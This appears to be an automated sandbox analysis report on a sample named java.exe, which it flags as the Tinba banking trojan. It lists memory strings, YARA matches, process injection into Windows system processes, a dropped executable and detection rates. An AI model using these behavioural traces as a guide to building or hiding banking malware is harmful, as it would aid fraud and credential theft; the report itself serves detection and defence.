            Source: explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
            Source: SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ng.com
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected Tinba Banker
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 7340, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winver.exe PID: 7396, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Yara detected Tinba Banker
            Source: Yara matchFile source: Process Memory Space: java.exe PID: 7340, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winver.exe PID: 7396, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SearchApp.exe PID: 4984, type: MEMORYSTR
            Source: C:\Windows\explorer.exeCode function: 3_2_01342270 NtQueryDirectoryFile,3_2_01342270
            Source: C:\Windows\explorer.exeCode function: 3_2_01341EE1 NtCreateUserProcess,3_2_01341EE1
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC21D1 NtEnumerateValueKey,4_2_00AC21D1
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_022300050_2_02230005
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_022318450_2_02231845
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230EA90_2_02230EA9
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_033918212_2_03391821
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03390E852_2_03390E85
            Source: C:\Windows\explorer.exeCode function: 3_2_013418213_2_01341821
            Source: C:\Windows\explorer.exeCode function: 3_2_01340E853_2_01340E85
            Source: C:\Windows\explorer.exeCode function: 3_2_013718213_2_01371821
            Source: C:\Windows\explorer.exeCode function: 3_2_01370E853_2_01370E85
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0E854_2_00AC0E85
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC18214_2_00AC1821
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910E855_2_00910E85
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_009118215_2_00911821
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0E856_2_009A0E85
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A18216_2_009A1821
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50E857_2_00A50E85
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A518217_2_00A51821
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40E858_2_00D40E85
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D418218_2_00D41821
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50E859_2_00B50E85
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B518219_2_00B51821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_0011182110_2_00111821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110E8510_2_00110E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_001C182113_2_001C1821
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_001C0E8513_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_0230000513_2_02300005
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_02300EA913_2_02300EA9
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0E8515_2_00AB0E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB182115_2_00AB1821
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_0029182116_2_00291821
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290E8516_2_00290E85
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 19_2_0058182119_2_00581821
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 19_2_00580E8519_2_00580E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 20_2_001C182120_2_001C1821
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 20_2_001C0E8520_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 20_2_022A000520_2_022A0005
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 20_2_022A0EA920_2_022A0EA9
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_003D182122_2_003D1821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_003D0E8522_2_003D0E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_00900E8523_2_00900E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_0090182123_2_00901821
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_0018182124_2_00181821
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_00180E8524_2_00180E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_0019182126_2_00191821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_00190E8526_2_00190E85
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_0001182128_2_00011821
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_00010E8528_2_00010E85
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_000D182129_2_000D1821
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_000D0E8529_2_000D0E85
            Source: C:\Windows\System32\dllhost.exeCode function: 30_2_0026182130_2_00261821
            Source: C:\Windows\System32\dllhost.exeCode function: 30_2_00260E8530_2_00260E85
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 31_2_04D80E8531_2_04D80E85
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 31_2_04D8182131_2_04D81821
            Source: C:\Windows\System32\conhost.exeCode function: 32_2_00880E8532_2_00880E85
            Source: C:\Windows\System32\conhost.exeCode function: 32_2_0088182132_2_00881821
            Source: C:\Windows\System32\conhost.exeCode function: 33_2_00900E8533_2_00900E85
            Source: C:\Windows\System32\conhost.exeCode function: 33_2_0090182133_2_00901821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 35_2_00890E8535_2_00890E85
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 35_2_0089182135_2_00891821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 36_2_0003182136_2_00031821
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 36_2_00030E8536_2_00030E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 37_2_0153182137_2_01531821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 37_2_01530E8537_2_01530E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 38_2_0277182138_2_02771821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 38_2_02770E8538_2_02770E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 39_2_00B80E8539_2_00B80E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 39_2_00B8182139_2_00B81821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 40_2_008B0E8540_2_008B0E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 40_2_008B182140_2_008B1821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 41_2_00B50E8541_2_00B50E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 41_2_00B5182141_2_00B51821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 42_2_02EB0E8542_2_02EB0E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 42_2_02EB182142_2_02EB1821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 43_2_02D10E8543_2_02D10E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 43_2_02D1182143_2_02D11821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 44_2_02B40E8544_2_02B40E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 44_2_02B4182144_2_02B41821
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 45_2_02E20E8545_2_02E20E85
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: 45_2_02E2182145_2_02E21821
            Source: C:\Windows\System32\conhost.exeCode function: String function: 00883653 appears 35 times
            Source: C:\Windows\System32\conhost.exeCode function: String function: 00903653 appears 35 times
            Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 03393653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00913653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 009A3653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 00D43653 appears 35 times
            Source: C:\Windows\System32\svchost.exeCode function: String function: 000D3653 appears 35 times
            Source: C:\Windows\System32\ctfmon.exeCode function: String function: 00A53653 appears 35 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: String function: 02303677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: String function: 001C3653 appears 70 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: String function: 022A3677 appears 34 times
            Source: C:\Windows\explorer.exeCode function: String function: 01373653 appears 35 times
            Source: C:\Windows\explorer.exeCode function: String function: 01343653 appears 34 times
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: String function: 00183653 appears 35 times
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: String function: 00013653 appears 35 times
            Source: C:\Windows\System32\smartscreen.exeCode function: String function: 00293653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 00B83653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 02EB3653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 01533653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 02D13653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 008B3653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 02E23653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 02B43653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 02773653 appears 35 times
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeCode function: String function: 00B53653 appears 35 times
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: String function: 00B53653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00193653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 003D3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00113653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00903653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00AB3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00893653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00033653 appears 35 times
            Source: C:\Windows\System32\sihost.exeCode function: String function: 00AC3653 appears 35 times
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: String function: 00583653 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04D83653 appears 35 times
            Source: C:\Windows\System32\dllhost.exeCode function: String function: 00263653 appears 35 times
            Source: C:\Users\user\Desktop\java.exeCode function: String function: 02233677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exeSection loaded: nss3.dllJump to behavior
            Source: java.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: classification engineClassification label: mal100.bank.expl.evad.winEXE@10/10@9/3
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230005 ExitProcess,GetProcAddress,IsWow64Process,GetModuleHandleW,GetStartupInfoA,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA,0_2_02230005
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\0C0BC82CJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
            Source: C:\Windows\SysWOW64\winver.exeMutant created: \Sessions\1\BaseNamedObjects\0C0BC82C
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: java.exeReversingLabs: Detection: 89%
            Source: java.exeVirustotal: Detection: 89%
            Source: unknownProcess created: C:\Users\user\Desktop\java.exe C:\Users\user\Desktop\java.exe
